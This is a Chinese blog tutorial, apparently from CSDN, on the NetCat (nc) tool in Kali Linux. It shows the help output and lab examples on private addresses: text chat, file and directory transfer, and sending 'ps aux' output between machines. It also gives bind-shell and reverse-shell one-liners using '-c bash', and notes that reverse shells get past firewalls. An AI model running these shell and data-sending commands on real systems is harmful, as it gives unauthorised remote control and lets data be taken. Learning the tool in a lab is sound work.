《工具录》NetCat

最新推荐文章于 2024-02-19 14:39:02 发布
最新推荐文章于 2024-02-19 14:39:02 发布
阅读量950 收藏 20
点赞数 22
分类专栏: 整理总结:安全工具录 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keeppromise/article/details/131619214
版权

工具录

本文以 kali-linux-2023.3-vmware-amd64 为例。

1:NetCat

NetCat(又称为 " nc ")被广泛用于计算机网络之间的数据传输和网络调试。允许用户通过 TCP 或 UDP 协议发送和接收数据。

功能描述

  • 网络工具中的瑞士军刀
  • 侦听模式 / 传输模式
  • 传输文本信息
  • 传输文件/目录
  • 远程控制/木马
  • 流媒体服务器
  • 远程克隆硬盘

nc 缺乏加密和身份验证的能力。

不同系统或平台的 NetCat 命令不尽相同。

基本语法
nc [选项]

2:选项介绍

选项总览

┌──(root㉿kali)-[~]
└─# nc -h                  
[v1.10-47]
connect to somewhere:   nc [-options] hostname port[s] [ports] ... 
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -C                      Send CRLF as line-ending
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

部分选项

参数说明
-q程序会从标准输入(stdin)中读取,一旦读取到输入流的末尾(EOF),它会等待一段指定的时间(secs)后退出。

3:示例

3.1:正向连接(被动连接)

示例 3.1-1:正向连接,仅限于文本消息传输,无法使用命令。Server 开启端口后被 kali 连接。

# 1、Server(192.168.8.133):
nc -lnv -p 6666

# 2、kali(192.168.8.128):
nc -nv 192.168.8.133 6666

示例 3.1-2:正向连接,可使用命令行。Server 开放自己的 bash shell,被 kali 连接。

# 1、Server(192.168.8.133):
nc -lnv -p 6666 -c bash

# 2、kali(192.168.8.128):
nc -nv 192.168.8.133 6666

如果是 Windows 下 bash 换成 cmd。

3.2:反向连接(主动连接)

示例 3.2-1:反向连接,可使用命令行。kali 开启端口监听后,Server 主动连接 kali,并开放自己的 bash shell。

# 1、kali(192.168.8.128):
nc -lnvp 6666

# 2、Server(192.168.8.133):
nc 192.168.8.128 6666 -c bash

因为防火墙的存在,通常反向连接(主动连接)比较常用,让目标机主动发送 shell。

3.3:信息收集

示例 3.3-1:使用反向连接,Server 上 ps aux 的结果会被保存到 kali 上的 test.txt。且完成后一秒自动断开连接。

# 1、kali(192.168.8.128):
nc -lnvp 6666 > /root/Desktop/test.txt

# 2、Server(192.168.8.133):
ps aux | nc -nv 192.168.8.128 6666 -q 1

3.4:文件传输

示例3.4.1:使用反向连接,将 Server 上的 2.txt 文件传输到 kali 并被保存为 1.txt。

# 1、kali(192.168.8.128):
nc -lnvp 6666 > /root/Desktop/1.txt

# 2、Server(192.168.8.133):
nc -nv 192.168.8.128 6666 < 2.txt -q 1

示例3.4.2:使用正向连接,将 Server 上的 ./test/ 目录传输到 kali 上。

# 1、Server(192.168.8.133):
tar -cvf - ./test/ | nc -lnvp 6666 -q 1

# 2、kali(192.168.8.128):
nc -nv 192.168.8.132 6666 | tar -xvf - -C /root/Desktop/

4:其他

《netcat 使用教程》
https://blog.csdn.net/qq_46137954/article/details/127478494

《瑞士军刀 Netcat》
https://blog.csdn.net/qq_63844103/article/details/127681824

年年岁岁花相似,岁岁年年人不同。

——《白头吟》(唐)刘希夷

永别了,赛艾斯滴恩
关注
  • 22
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
netcat下载 nc下载 netcat命令 nc命令
02-10
【标题】"netcat下载 nc下载 netcat命令 nc命令"涉及的是网络工具Netcat的基本信息,包括下载和使用。Netcat,简称nc,是一个开源、跨平台的网络工具,常被网络安全专家和系统管理员用于创建各种网络连接,进行端口...
仿nc(netcat) 简单socket 工具 源码
08-26
一个自己写的仿nc软件。\\\\ 支持记输入数量、发送数量和接受数量;日志信息错开标准输出流(使用cerr); 支持缓存多行内容一起发送; windows/linux跨平台 直接编译。
下安装netcat工具的步骤
renzhe1301的专栏
08-05 2467
解决方法:加上 --no-check-certificate 参数。3、下载安装包(注意需要提前安装wget,自行百度)通过返回看到缺少gcc, 安装gcc。看报权限不够的错误,sudo执行。操作系统:centos7。看样子成功了, 验证下。......
netcat——网络的瑞士军刀
#的博客
03-09 1657
前言: 早些时候了解过nc,但是那时候还没有博客,今天来专门做个记对于这把鼎鼎大名的网络瑞士军刀——netcat。 以下内容主要转载编程随想 以下内容主要参考编程随想 以下内容主要参考编程随想 概念 NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。 它诞生于1995年,在网络安全社区的名气很大(就如同 AK47 在军事领域的名气)。长期在安全圈内混的人,应该都知道它。想当年,insecure.org 网站在本世纪初搞过几次“年度投票”,评选...
netcat学习记
a571255945的博客
09-22 911
1.什么是Netcat? Netcat 或者叫 nc 是 Linux 下的一个用于调试和检查网络工具包。可用于创建 TCP/IP 连接,最大的用途就是用来处理 TCP/UDP 套接字。 netcat的参数含义: 2.用netcat搭建局域网客户端和服务端 服务端 netcat -l -p port或 nc -l -p port 注意-p参数不能少 例如:netcat -l -p 10000 用n...
【KALI使用】6 工具 NETCAT
(∪.∪ )...zzz的博客
09-05 564
这里写目标题NETCAT ——NC功能:网络工具中的瑞士军刀——小⾝身材、⼤大智慧侦听模式 / 传输模式telnet / 获取banner信息传输文本信息传输文件/目可以远程电子取证传输文件传输目加密传输文件 NETCAT ——NC功能: 网络工具中的瑞士军刀——小⾝身材、⼤大智慧 侦听模式 / 传输模式 telnet / 获取banner信息 nc -nv POP3的ip 110 nc- nv SMTP的ip 25 # -n 接IP地址 -v 详细内容 传输文本信息 A:nc -l -
linux开发中常用的工具netcat(nc瑞士军刀)
热门推荐
涤生大数据
01-14 1万+
一:什么是瑞士军刀(netcat/nc)?      netcat被誉为网络安全界的‘瑞士军刀’,简称nc.一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门(back-end)工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接.      使用之前首先我们要弄明白ne
网络安全-nc(Netcat工具详解
weixin_39445116的博客
02-19 667
经常在反弹shell的时候使用nc命令,但是从来没有了解过,今天翻书看到了,准备记一下。使用nc来监听端口,等待被控制的服务器发起连接。所以运行nc的服务器一般要在公网才可以。nc全称Netcat,是TCP/IP连接的瑞士军刀。哈哈我最喜欢瑞士军刀了。-l,代表listen,监听的意思,-v代表详细输出。有一个比较偏的知识点,nc还可以探测目标的端口是否开放,目标机执行反弹shell的几种姿势,留着以后再学习吧。比如如下, 其80端口是开放的。
基本工具-NETCAT(telnet-banner、传输文本信息)
山兔的博客
08-07 1227
我们日后的学习工作,以及学习过程,都会经常性的,重复使用到这些工具,所以,基于这点,我把这些特别特别重要的工具,给先拿出来介绍一下​ • 经常使⽤且功能强⼤​ • 安全从业者必不可少的帮⼿• Nc / ncat• Wireshark• Tcpdump我们每个人都必须熟练的掌握这些工具常见的大部分功能,如果能运用的特别娴熟的话,就更好了• 网络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧• 侦听模式 / 传输模式• telnet / 获取banner信息• 传输⽂本信息• 传输⽂件/目• 加密传输⽂件• 远程控制/⽊
好用的netcat工具
daemon69的专栏
08-08 1544
NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本。因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小)、功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接。 一、版本 通常的Linux发行版中都带有NetCat(简称nc),甚
Netcat简介
多学多思
09-29 4223
FROM: 点击打开链接 NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat,它的实际可运行的名字叫n
netcat
02-11
netcat被誉为网络安全界的'瑞士军刀' 透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够...
TCP UDp 连接工具
03-08
例如,`ping`命令可以测试网络的可达性,`traceroute`(或`tracert`)可以追踪数据包从源到目的地的路径,`nc`(netcat)和`socat`工具则能创建TCP或UDP连接来进行数据传输测试。 支持多连接的TCP UDP连接工具,...
【TCP&UDP测试工具
最新发布
02-21
5. **netcat (nc)**: 一个简单灵活的网络工具,可用于创建TCP连接进行数据传输测试。 **UDP测试工具** UDP是一种无连接的协议,不保证数据包的顺序或可靠性,适合实时应用如视频流和在线游戏。以下是一些常用的UDP...
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 5249
这里写自定义目标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 3807
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目,可以吗?
m0_48179608的博客
03-02 7541
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 3454
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
wget安装netcat
08-14
- *3* [Centos 如何安装netcat工具?](https://blog.csdn.net/weixin_40191861/article/details/130257691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值